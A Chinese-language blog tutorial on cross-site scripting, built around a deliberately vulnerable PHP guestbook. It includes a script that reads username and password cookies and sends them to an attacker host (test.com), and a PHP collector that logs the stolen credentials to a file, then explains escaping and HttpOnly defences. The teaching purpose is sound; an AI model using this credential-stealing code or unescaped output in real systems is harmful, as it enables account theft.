XSS攻擊簡單實例

XSS為目前web常見攻擊手段之一,不了解的同學可以看我的上一篇文章《常見WEB攻擊之XSS攻擊》

下面我演示一個簡單的留言板攻擊實例

我們有個頁面用于允許用戶發(fā)表留言,然后在頁面底部顯示留言列表
前端代碼如下:

<!DOCTYPE html><html><head>
    <?php include('/components/headerinclude.php');?></head>
    <style type="text/css">
        .comment-title{
            font-size:14px;
            margin: 6px 0px 2px 4px;
        }

        .comment-body{
            font-size: 14px;
            color:#ccc;
            font-style: italic;
            border-bottom: dashed 1px #ccc;
            margin: 4px;
        }
    </style>
    <script type="text/javascript" src="/js/cookies.js"></script><body>
    <form method="post" action="list.php">
        <div style="margin:20px;">
            <div style="font-size:16px;font-weight:bold;">Your Comment</div>
            <div style="padding:6px;">
                Nick Name:                <br/>
                <input name="name" type="text" style="width:300px;"/>
            </div>
            <div style="padding:6px;">
                Comment:                <br/>
                <textarea name="comment" style="height:100px; width:300px;"></textarea>
            </div>
            <div style="padding-left:230px;">
                <input type="submit" value="POST" style="padding:4px 0px; width:80px;"/>
            </div>
            <div style="border-bottom:solid 1px #fff;margin-top:10px;">
                <div style="font-size:16px;font-weight:bold;">Comments</div>
            </div>
            <?php 
                require('/components/comments.php'); 
                if(!empty($_POST['name'])){
                    addElement($_POST['name'],$_POST['comment']);
                }
                renderComments();            ?>
        </div>
    </form></body></html>

addElement()方法用于添加新的留言,而renderComments()方法用于展留言列表,網(wǎng)頁看起來是這樣的


02105935_5hbx.png

XSS攻擊

因為我們完全信任了用戶輸入,但有些別有用心的用戶會像這樣的輸入


02105935_jLwV.png

這樣無論是誰訪問這個頁面的時候控制臺都會輸出“Hey you are a fool fish!”,如果這只是個惡意的小玩笑,有些人做的事情就不可愛了,有些用戶會利用這個漏洞竊取用戶信息、誘騙人打開惡意網(wǎng)站或者下載惡意程序等,看個最簡單的例子

利用xss竊取用戶名密碼

當然這個示例很簡單,幾乎攻擊不到任何網(wǎng)站,僅僅看看其原理。我們知道很多登陸界面都有記住用戶名、密碼的功能方便用戶下次登錄,有些網(wǎng)站是直接用明文記錄用戶名、密碼,惡意用戶注冊賬戶登錄后使用簡單工具查看cookie結構名稱后,如果網(wǎng)站有xss漏洞,那么簡單的利用jsonp就可以獲取其它用戶的用戶名、密碼了。

惡意用戶會這么輸入


02105935_6Ad3.png

我們看看 http://test.com/hack.js 里藏了什么

var username=CookieHelper.getCookie('username').value;
var password=CookieHelper.getCookie('password').value;
var script =document.createElement('script');
script.src='http://test.com/index.php?username='+username+'&password='+password;
document.body.appendChild(script);

幾句簡單的javascript,獲取cookie中的用戶名密碼,利用jsonp把向 http://test.com/index.php

發(fā)送了一個get請求
http://test.com/index.php

<?php    
if(!empty($_GET['password'])){        
$username=$_GET['username'];        
$password=$_GET['password'];        
      try{           
         $path=$_SERVER["DOCUMENT_ROOT"].'/password.txt';            
         $fp=fopen($path,'a');            
         flock($fp, LOCK_EX);            
         fwrite($fp, "$username\t $password\r\n");           
         flock($fp, LOCK_UN);            
         fclose($fp);
     }catch(Exception $e){
                      ........
      }
 ?>

上面演示的是一個非常簡單的XSS攻擊,還有很多隱蔽的方式,但是其核心都是利用了腳本注入。
因此我們解決辦法其實很簡單:不信賴用戶輸入,對特殊字符如”<”,”>”轉義,就可以從根本上防止這一問題。使用htmlspecialchars函數(shù)將特殊字符轉換成HTML編碼。

XSS攻擊可以進行session劫持:Hack通過腳本注入到應用服務器,待其他真實用戶A登錄訪問含有XSS腳本的網(wǎng)頁,腳本激活,將客戶的session信息發(fā)送給Hack,Hack就使用該session直接扮演用戶A訪問服務器。這種session劫持主要靠XSS漏洞和客戶端獲取sessionId完成,防范分兩步:
1、過濾用戶輸入,防止XSS漏洞
2.、設置sessionId的cookie為HttpOnly,使客戶端無法獲取

?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
【社區(qū)內容提示】社區(qū)部分內容疑似由AI輔助生成,瀏覽時請結合常識與多方信息審慎甄別。
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發(fā)布,文章內容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

相關閱讀更多精彩內容

  • 跨站腳本(XSS)是web應用中的一種典型的計算機安全漏洞。XSS允許攻擊者可以在其他用戶瀏覽的web頁面中注入客...
    留七七閱讀 8,321評論 1 26
  • 什么是XSS? 跨站腳本(Cross-Site Scripting,XSS)是一種經常出現(xiàn)在 Web 應用程序中的...
    lokisteven閱讀 1,769評論 0 2
  • 攻擊活動 SQL(結構化查詢語言)注入 概述 一個SQL注入攻擊包含了從應用客戶端的輸入數(shù)據(jù)中注入或嵌入的方式,一...
    夏夜星語閱讀 1,146評論 0 0
  • 本文主要講解具體有哪些攻擊 Web 站點的手段,以及攻擊會造成怎樣的影響。 針對 Web 應用的攻擊模式 對 We...
    杰哥長得帥閱讀 1,801評論 0 5
  • 滾蛋吧,媽寶和寶媽! 記得錢鐘書老先生的《圍城》里有這樣一句頗為經典的話“婚姻是一座圍城,城外的人想進去,城里...
    踮起腳尖的小姐姐閱讀 338評論 1 2

友情鏈接更多精彩內容